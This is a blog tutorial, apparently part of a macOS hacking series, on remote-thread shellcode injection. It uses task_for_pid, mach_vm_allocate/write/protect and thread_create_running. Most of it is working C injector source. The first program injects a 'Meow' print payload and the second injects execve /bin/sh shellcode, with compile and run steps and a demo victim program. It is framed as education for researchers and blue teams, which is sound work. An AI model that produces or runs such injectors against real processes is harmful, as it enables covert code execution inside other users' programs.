MacOS hacking part 10: shellcode injection via task_for_pid - create remote thread. Simple C (Intel) example
﷽
Hello, cybersecurity enthusiasts and white hackers!
In the previous post we stole an existing thread: we paused a victim, rewired its registers so RIP
pointed at our buffer, and let it run. That’s thread hijacking - fast, but risky: you might grab a thread in the middle of a syscall, under a lock, or with an odd stack frame. Race conditions and crashes are common.
Today, we’re going further - instead of hijacking an existing thread, we’ll create an entirely new thread in the target process using thread_create_running
. This is a cleaner and more stable technique with fewer side effects.
This technique is known as remote thread injection. While it requires similar permissions (task_for_pid
), the flow is slightly different. Here’s what happens:
First of all, find the PID
of the victim process.
then use task_for_pid
to get the task port for the victim.
allocate memory in the remote process.
write your shellcode into that memory.
mark the memory executable.
allocate a dummy stack.
set up CPU
registers (RIP
to shellcode, RSP
to top of dummy stack).
spawn a thread in the victim using thread_create_running
.
practical example
Let’s create PoC for this technique step-by-step.
When hijacking a thread, you’re overwriting its context, resuming it, and hoping it behaves. This can crash or deadlock the process if you’re not careful. With new thread injection, we avoid all that. We get a clean, isolated thread to run our shellcode, and the rest of the process is (mostly) untouched.
First of all attach to the process as before:
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
You’ll need root for this unless SIP is disabled.
Then use mach_vm_allocate()
to find a page in the remote address space and allocate memory for shellcode.
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
Write shellcode to remote memory:
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
At the next step, flip the pages to R-X
. Executing from a non-exec page triggers a BUS ERROR
on macOS, so don’t skip this.
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
Setup dummy stack:
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
Align to 16
bytes for x86_64
ABI. Set RSP
to the top of that region (minus a small red zone):
state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned
Finally, create the thread:
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
What is going on here? We ask the kernel to spin up a new thread in the target with your register context. The scheduler will start it at your entry point.
Finally, we need shellcode:
unsigned char shellcode[] =
"\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
"\x50\xbf\x01\x00\x00\x00"
"\x48\x89\xe6\xba\x05\x00\x00\x00"
"\xb8\x04\x00\x00\x02\x0f\x05"
"\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";
from one our previous posts in macOS hacking series:
global start
section .text
start:
mov rax, 0x0a776f654d ; "\nwoeM" in little-endian
push rax ; string now on stack
mov rdi, 1 ; fd = 1 (stdout)
mov rsi, rsp ; pointer to "Meow\n"
mov rdx, 5 ; length = 5 bytes
mov rax, 0x2000004 ; syscall: write
syscall
mov rax, 0x2000001 ; syscall: exit
xor rdi, rdi ; exit code 0
syscall
So full source code is looks like this hack.c
:
/*
* hack.c
* macOS x86_64 shellcode injection
* using task_for_pid and
* remote thread creation
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>
unsigned char shellcode[] =
"\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
"\x50\xbf\x01\x00\x00\x00"
"\x48\x89\xe6\xba\x05\x00\x00\x00"
"\xb8\x04\x00\x00\x02\x0f\x05"
"\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "usage: %s <pid>\n", argv[0]);
return 1;
}
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
return 0;
}
demo
Let’s go to see this in action. First of all, we need “victim” process. As usual, let me use meow.c
:
/*
* meow.c
* victim process for macOS injection tests
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
printf("victim process started. PID: %d\n", getpid());
while (1) {
printf("meow-meow... PID: %d\n", getpid());
sleep(5); // simulate periodic activity
}
return 0;
}
Compile it:
clang -o meow meow.c
and check:
./meow
Then compile our injector:
clang -o hack hack.c
And run:
./hack <PID>
As you can see, everything is worked perfectly! =^..^=
practical example 2
In this case, just update my shellcode:
/*
* hack2.c
* macOS x86_64 shellcode injection
* using task_for_pid and
* remote thread creation
* author @cocomelonc
* https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>
unsigned char shellcode[] =
/* 0000 */ "\x31\xf6" /* xor esi, esi */
/* 0002 */ "\xf7\xe6" /* mul esi */
/* 0004 */ "\x0f\xba\xe8\x19" /* bts eax, 0x19 */
/* 0008 */ "\xb0\x3b" /* mov al, 0x3b */
/* 000A */ "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* movabs rbx, 0x68732f2f6e69622f */
/* 0014 */ "\x52" /* push rdx */
/* 0015 */ "\x53" /* push rbx */
/* 0016 */ "\x54" /* push rsp */
/* 0017 */ "\x5f" /* pop rdi */
/* 0018 */ "\x0f\x05"; /* syscall */
int main(int argc, char *argv[]) {
if (argc != 2) {
fprintf(stderr, "usage: %s <pid>\n", argv[0]);
return 1;
}
pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] attached to pid %d\n", pid);
mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);
kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] wrote shellcode\n");
kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] set memory protections to RX\n");
// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));
// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;
// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
return 1;
}
state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned
kr = thread_create_running(task,
x86_THREAD_STATE64,
(thread_state_t)&state,
state_count,
&thread);
if (kr != KERN_SUCCESS) {
fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
return 1;
}
printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);
return 0;
}
demo 2
Let’s go to see second example in action.
Compile it:
clang -o hack2 hack2.c
Run victim process:
./meow
Then run injector:
./hack2 <PID>
As you can see, in this case also everything is worked as expected! =^..^=
For debugging purpose you can use lldb
:
lldb -p <PID>
thread list
After run injector, check thread list again:
thread list
As you can see, new thread successfully created!
Check shellcode:
disassemble --start-address=<our_remote_address> --count=16
As you can see, shellcode successfully injected and thread created! =^..^=
Unfortunately, lldb
doesn’t let you search threads by address directly - you’ll have to look manually. Breakpoints can be tricky because you don’t know the shellcode address ahead of time unless printed. If your thread finishes quickly, lldb
might not catch it unless you attach early.
If you want you can use lldb python scripting to auto-select the injected thread by its TID
or to dump memory around RIP
.
conclusion
Thread hijack shows how fragile cross-process execution can be. Remote thread creation shows the stable alternative: give your code a clean context and stack, don’t kidnap a live worker. Both leave trails; both are increasingly constrained by platform hardening. Understanding the mechanics helps defenders build better telemetry - and helps researchers avoid self-inflicted crashes.
I hope this post is useful for malware researchers, macOS/Apple
security researchers, C/C++/ASM
programmers, spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.
macOS hacking part 1
macOS hacking part 9
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine